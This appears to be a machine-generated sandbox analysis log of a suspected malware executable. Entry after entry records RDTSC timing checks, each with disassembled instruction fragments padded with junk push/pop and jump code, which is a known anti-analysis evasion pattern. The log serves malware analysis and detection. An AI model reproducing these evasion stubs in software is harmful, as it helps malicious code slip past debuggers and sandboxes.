Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB184 second address: CCB1A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4DCCF8FBD3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB42D second address: CCB434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB593 second address: CCB597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB597 second address: CCB5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDA4F second address: CCDA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4DCCF8FBD2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDA69 second address: CCDA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDA6D second address: CCDA75 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3177 second address: CD318B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CDEh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5443E second address: C54450 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4DCCF8FBCCh 0x00000008 jnl 00007F4DCCF8FBC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1AEF second address: CD1B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CDEh 0x00000009 jl 00007F4DCCCB3CD6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1B0C second address: CD1B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1B12 second address: CD1B1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F4DCCCB3CD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1B1D second address: CD1B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 ja 00007F4DCCF8FBC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1B2B second address: CD1B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1B3B second address: CD1B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2114 second address: CD212D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4DCCCB3CDDh 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD212D second address: CD2139 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4DCCF8FBCEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2139 second address: CD2140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2140 second address: CD214C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4DCCF8FBC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD250B second address: CD2515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4DCCCB3CD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2678 second address: CD2682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4DCCF8FBC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2682 second address: CD26B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4DCCCB3CDFh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4DCCCB3CE2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD26B7 second address: CD26BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD26BC second address: CD26C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2B4B second address: CD2B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F4DCCF8FBCEh 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007F4DCCF8FBDCh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2B7F second address: CD2B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CDBh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F4DCCCB3CD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C578E9 second address: C578EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD77A6 second address: CD77C7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4DCCCB3CD6h 0x00000008 jmp 00007F4DCCCB3CDFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F4DCCCB3CD8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9989B second address: C998A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C998A6 second address: C998AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C998AA second address: C998C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C998C6 second address: C998D0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4DCCCB3CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C998D0 second address: C998E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C998E9 second address: C99954 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F4DCCCB3CDAh 0x0000000e call 00007F4DCCCB3CE9h 0x00000013 jmp 00007F4DCCCB3CDDh 0x00000018 pop edi 0x00000019 lea eax, dword ptr [ebp+1247E60Bh] 0x0000001f mov dx, 1AC1h 0x00000023 nop 0x00000024 jmp 00007F4DCCCB3CE1h 0x00000029 push eax 0x0000002a pushad 0x0000002b jmp 00007F4DCCCB3CDBh 0x00000030 push eax 0x00000031 push edx 0x00000032 jnl 00007F4DCCCB3CD6h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99FBC second address: C99FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99FC1 second address: C99FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4DCCCB3CD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 6917BA72h 0x00000014 or edx, 2BCD79F5h 0x0000001a call 00007F4DCCCB3CD9h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99FE9 second address: C99FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99FF0 second address: C99FFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A11D second address: C9A123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A123 second address: C9A147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b add dword ptr [ebp+122D2ADDh], ecx 0x00000011 nop 0x00000012 jmp 00007F4DCCCB3CDBh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A147 second address: C9A14D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A44E second address: C9A4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4DCCCB3CD8h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 pushad 0x00000016 mov ebx, dword ptr [ebp+122D2CC6h] 0x0000001c pushad 0x0000001d stc 0x0000001e cmc 0x0000001f popad 0x00000020 popad 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F4DCCCB3CD8h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000014h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d push eax 0x0000003e pushad 0x0000003f push esi 0x00000040 push edx 0x00000041 pop edx 0x00000042 pop esi 0x00000043 push eax 0x00000044 push edx 0x00000045 js 00007F4DCCCB3CD6h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6B80 second address: CD6BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD3h 0x00000007 pushad 0x00000008 jmp 00007F4DCCF8FBD1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6CD8 second address: CD6CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD71F8 second address: CD7214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F4DCCF8FBD4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7214 second address: CD721A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD735E second address: CD73B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4DCCF8FBC6h 0x0000000a jne 00007F4DCCF8FBC6h 0x00000010 popad 0x00000011 pushad 0x00000012 jc 00007F4DCCF8FBC6h 0x00000018 push esi 0x00000019 pop esi 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d jmp 00007F4DCCF8FBD8h 0x00000022 jmp 00007F4DCCF8FBD5h 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007F4DCCF8FBC6h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBAAB second address: CDBAC0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4DCCCB3CDCh 0x00000008 js 00007F4DCCCB3CD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBAC0 second address: CDBAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBAC4 second address: CDBAD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBAD0 second address: CDBADD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4DCCF8FBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBADD second address: CDBAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBAE3 second address: CDBAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBAE9 second address: CDBAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBAF2 second address: CDBB0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDBECA second address: CDBEF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE7h 0x00000007 jno 00007F4DCCCB3CD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F4DCCCB3CDCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB693 second address: CDB697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB697 second address: CDB69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC464 second address: CDC46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC5B7 second address: CDC5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DCCCB3CDFh 0x00000009 jmp 00007F4DCCCB3CE0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC5DA second address: CDC5F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD4h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC5F5 second address: CDC604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC604 second address: CDC61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F4DCCF8FBC6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnl 00007F4DCCF8FBC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC61A second address: CDC631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4DCCCB3CDAh 0x0000000c jnc 00007F4DCCCB3CD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC631 second address: CDC640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4DA3A second address: C4DA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4DA3E second address: C4DA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007F4DCCF8FBD7h 0x00000010 jmp 00007F4DCCF8FBCFh 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4DA62 second address: C4DA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4DCCCB3CD6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE65E0 second address: CE65EA instructions: 0x00000000 rdtsc 0x00000002 js 00007F4DCCF8FBC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5EE3 second address: CE5EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE7CB4 second address: CE7CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE7CBC second address: CE7CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9BB9 second address: CE9BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4DCCF8FBC6h 0x0000000a jmp 00007F4DCCF8FBD3h 0x0000000f ja 00007F4DCCF8FBC6h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F4DCCF8FBD6h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF8EA second address: CEF8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4DCCCB3CDCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF8FE second address: CEF91D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4DCCF8FBD9h 0x00000008 jmp 00007F4DCCF8FBD3h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A5F0 second address: C9A5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A5F4 second address: C9A654 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D23E6h], ecx 0x00000012 mov ebx, dword ptr [ebp+1247E64Ah] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F4DCCF8FBC8h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 jmp 00007F4DCCF8FBD1h 0x00000037 add eax, ebx 0x00000039 mov di, ax 0x0000003c nop 0x0000003d push eax 0x0000003e jl 00007F4DCCF8FBCCh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEFFDA second address: CEFFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEFFDE second address: CEFFE8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4DCCF8FBCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF0132 second address: CF0145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007F4DCCCB3CD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF4A16 second address: CF4A48 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4DCCF8FBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F4DCCF8FBCCh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F4DCCF8FBD7h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF4A48 second address: CF4A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3FBE second address: CF3FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4DCCF8FBC6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F4DCCF8FBCDh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF413F second address: CF4145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF4145 second address: CF416F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F4DCCF8FBC6h 0x0000000f jmp 00007F4DCCF8FBCFh 0x00000014 popad 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007F4DCCF8FBD2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF416F second address: CF4187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4DCCCB3CD6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007F4DCCCB3CD6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF45E2 second address: CF45E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
